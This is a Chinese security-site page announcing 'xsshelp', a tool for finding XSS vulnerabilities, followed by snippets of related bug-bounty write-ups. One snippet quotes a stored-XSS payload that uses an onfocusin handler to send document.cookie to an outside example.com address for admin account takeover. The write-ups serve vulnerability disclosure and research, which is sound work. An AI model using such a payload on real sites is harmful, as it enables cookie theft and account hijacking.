一款挖掘xss漏洞的工具

VSole2023-07-17 09:30:03

xsshelp

闲着没事随便写的一个辅助挖掘xss漏洞的工具（主要手懒为了省事，就把每回挖xss的一个比较好用的思路简单给用工具实现了下）

xsshelp version: 1.0.0Usage:  [-ut] [-u url] [-t thread] [-h help]Options:  -h  this help  -t intthread Num (default 8)  -u string      a target url(Please add http or https)

刚开始是用python写的，链接在这：https://github.com/wa1ki0g/xsshelp-py

下载地址

链接：https://pan.quark.cn/s/51daa03ecb22
https://github.com/wa1ki0g/xsshelp

漏洞挖掘xss

撤稿纠错

本作品采用《CC 协议》，转载必须注明作者和本文链接

web漏洞挖掘指南 -XSS跨站脚本攻击

2021-10-12 16:30:53

跨站脚本英文全称（Cross Site Scripting跨站脚本），为了不和css层叠样式表(英文全称：Cascading Style Sheets)混淆，因此将跨站脚本缩写为XSS。本期我们讲解一下XSS漏洞原理和利用检测。

一款XSS盲打漏洞测试工具

2023-05-09 14:20:32

ezXSS介绍ezXSS是一款用于渗透测试和漏洞挖掘的XSS盲测跨站脚本工具。在演示版本中可能禁用了一些特性。

快速找出网站中可能存在的XSS漏洞

2022-11-30 16:06:59

但当存在存储型XSS时，受害者打开此URL，攻击代码将会被触发，这种情况下便称之为存储型XSS漏洞。在标题处和帖子内容中分别填写payload，填写好之后，应与下图一致填写好内容之后，点击下方的发表按钮，即可进行发帖，发帖成功会弹出一个提示成功，如下图所示?????

一款挖掘xss漏洞的工具

2023-07-17 09:30:03

xsshelp闲着没事随便写的一个辅助挖掘xss漏洞的工具xsshelp version: 1.0.0Usage: [-ut] [-u url] [-t thread] [-h help]Options: -h this help -t intthread Num -u string a target url

记一次5657美金赏金的XSS漏洞挖掘经历

2023-06-05 09:20:03

我发现了一个存储的XSS漏洞，我可以通过窃取cookie升级为帐户接管。我的payload目前需要最少的用户交互，只需单击即可。之后，向下滚动并单击取消预约。确保您拦截了此请求。使用以下有效载荷添加消息："><xss/id="1"/tabindex="1"/onfocusin="window.location.href='https://example.com?cookie='%2bdocument.cookie">您通常会收到一个确认框，确认您的预约已取消，单击确定。即使管理员注销，此cookie也可以轻松重用。这是因为cookie不会过期。影响我能够通过取消我们的预约并包含一条消息来接管一个管理员帐户。这意味着我们必须找到一个具有用户交互的。

记一次Microsoft服务预订中的存储型XSS漏洞挖掘

2023-01-06 11:43:23

在查看电子邮件时，我发现了 Microsoft 的新服务预订。Microsoft booking 允许任何人预订服务/日历时段。此应用程序有两个界面，一个是内部界面，另一个是面向公众的服务页面。我决定深入检查这个应用程序。我尝试插入各种 XSS payload 来触发 xss 但没有成功。现在我的注意力转移到了这个标签上。应用程序有各种保护机制来防止脚本的执行。

实战 | 记一次微软的3000美金赏金的反射型XSS漏洞挖掘

2023-02-20 11:43:50

在这篇文章中，我将讨论 Microsoft Forms 中反射式跨站点脚本漏洞的详细信息。它允许用户创建表单和调查，与他人共享，并在集中位置收集响应。但是，我们发现可以将恶意JavaScript代码注入表单中，这些代码可以由毫无戒心的用户执行。我遵循了 MSRC 报告漏洞的准则并提交了我的发现。欲了解更多信息，请参阅：向 MSRC 提交报告的示例 https://www.microsoft.com/en-us/msrc/bounty-example-report-submission微软赏金计划 |微软公司 https://www.microsoft.com/en-us/msrc/bounty?

实战 | 记一次3000欧元赏金的IDOR + Self XSS漏洞挖掘

2022-07-09 09:43:56

每个黑客都会遇到这个，第一个赏金。我实际上无法解释它的感觉，但我知道你们中的大多数人都能理解它的感觉。当我们开始在 Web 应用程序安全中进行漏洞赏金时，我们大多数人都会从 XSS开始，故事从这里开始。

记一次NFT平台的存储型XSS和IDOR漏洞挖掘过程

2023-06-30 11:16:42

记一次NFT平台的存储型XSS和IDOR漏洞这是我在 NFT 市场中发现的一个令人兴奋的安全问题，它允许我通过链接 IDOR 和 XSS 来接管任何人的帐户，以实现完整的帐户接管漏洞。我们能够用我们自己的价值观修改受害者用户的个人资料。现在我们可以提出任何其他请求来执行其他经过身份验证的操作，例如出售艺术品或转让或删除用户的艺术品漏洞披露

记一次1000美金的TikTok盲打XSS的漏洞挖掘

2022-07-22 07:21:43

大家好，在本文中，我将分享我在2个TikTok资产发现的XSS漏洞。当我决定在TikTok 程序中寻找漏洞时，我花了1个月的时间寻找这个XSS。当我在TikTok 卖家账户上创建产品时，这个 XSS 发现开始了我在卖家账户的产品名称中插入了 XSS payload。

VSole

网络安全专家